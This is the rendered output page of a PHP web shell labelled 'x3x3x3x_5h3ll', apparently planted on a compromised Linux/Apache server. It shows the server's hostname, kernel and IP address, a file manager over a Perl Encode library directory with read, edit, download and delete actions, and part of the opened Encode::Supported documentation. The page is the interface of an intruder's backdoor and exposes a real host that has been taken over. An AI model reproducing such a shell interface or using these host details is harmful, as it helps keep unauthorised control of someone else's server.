x3x3x3x_5h3ll
— 53cur3 — 5h3ll_1d —
Linux vps-10654784.cedaps.org.br 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
  INFO SERVER : Apache PHP : 7.4.33
/lib64/perl5/vendor_perl/Encode/
162.240.100.168

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACTN ]
+FILE +DIR
CN dir drwxr-xr-x 2022-12-09 19:44 R D
JP dir drwxr-xr-x 2022-12-09 19:44 R D
KR dir drwxr-xr-x 2022-12-09 19:44 R D
MIME dir drwxr-xr-x 2022-12-09 19:44 R D
Unicode dir drwxr-xr-x 2022-12-09 19:44 R D
Alias.pm 11.903 KB -rw-r--r-- 2013-04-29 22:19 R E G D
Byte.pm 2.373 KB -rw-r--r-- 2013-04-29 22:19 R E G D
CJKConstants.pm 1.644 KB -rw-r--r-- 2013-04-29 22:19 R E G D
CN.pm 1.994 KB -rw-r--r-- 2013-04-29 22:19 R E G D
Config.pm 5.923 KB -rw-r--r-- 2013-04-29 22:19 R E G D
EBCDIC.pm 0.845 KB -rw-r--r-- 2013-04-29 22:19 R E G D
Encoder.pm 6.166 KB -rw-r--r-- 2013-04-29 22:19 R E G D
Encoding.pm 8.882 KB -rw-r--r-- 2013-04-29 22:19 R E G D
GSM0338.pm 11.524 KB -rw-r--r-- 2013-04-29 22:19 R E G D
Guess.pm 9.854 KB -rw-r--r-- 2013-04-29 22:19 R E G D
JP.pm 2.619 KB -rw-r--r-- 2013-04-29 22:19 R E G D
KR.pm 1.914 KB -rw-r--r-- 2013-04-29 22:19 R E G D
PerlIO.pod 5.918 KB -rw-r--r-- 2011-11-11 15:43 R E G D
Supported.pod 28.062 KB -rw-r--r-- 2013-02-18 02:18 R E G D
Symbol.pm 0.827 KB -rw-r--r-- 2013-04-29 22:19 R E G D
TW.pm 2.238 KB -rw-r--r-- 2013-04-29 22:19 R E G D
Unicode.pm 8.745 KB -rw-r--r-- 2013-04-29 22:19 R E G D
REQUEST EXIT
=head1 NAME Encode::Supported -- Encodings supported by Encode =head1 DESCRIPTION =head2 Encoding Names Encoding names are case insensitive. White space in names is ignored. In addition, an encoding may have aliases. Each encoding has one "canonical" name. The "canonical" name is chosen from the names of the encoding by picking the first in the following sequence (with a few exceptions). =over 2 =item * The name used by the Perl community. That includes 'utf8' and 'ascii'. Unlike aliases, canonical names directly reach the method so such frequently used words like 'utf8' don't need to do alias lookups. =item * The MIME name as defined in IETF RFCs. This includes all "iso-"s. =item * The name in the IANA registry. =item * The name used by the organization that defined it. =back In case I canonical names differ from that of the Encode module, they are always aliased if it ever be implemented. So you can safely tell if a given encoding is implemented or not just by passing the canonical name. Because of all the alias issues, and because in the general case encodings have state, "Encode" uses an encoding object internally once an operation is in progress. =head1 Supported Encodings As of Perl 5.8.0, at least the following encodings are recognized. Note that unless otherwise specified, they are all case insensitive (via alias) and all occurrence of spaces are replaced with '-'. In other words, "ISO 8859 1" and "iso-8859-1" are identical. Encodings are categorized and implemented in several different modules but you don't have to C to make them available for most cases. Encode.pm will automatically load those mod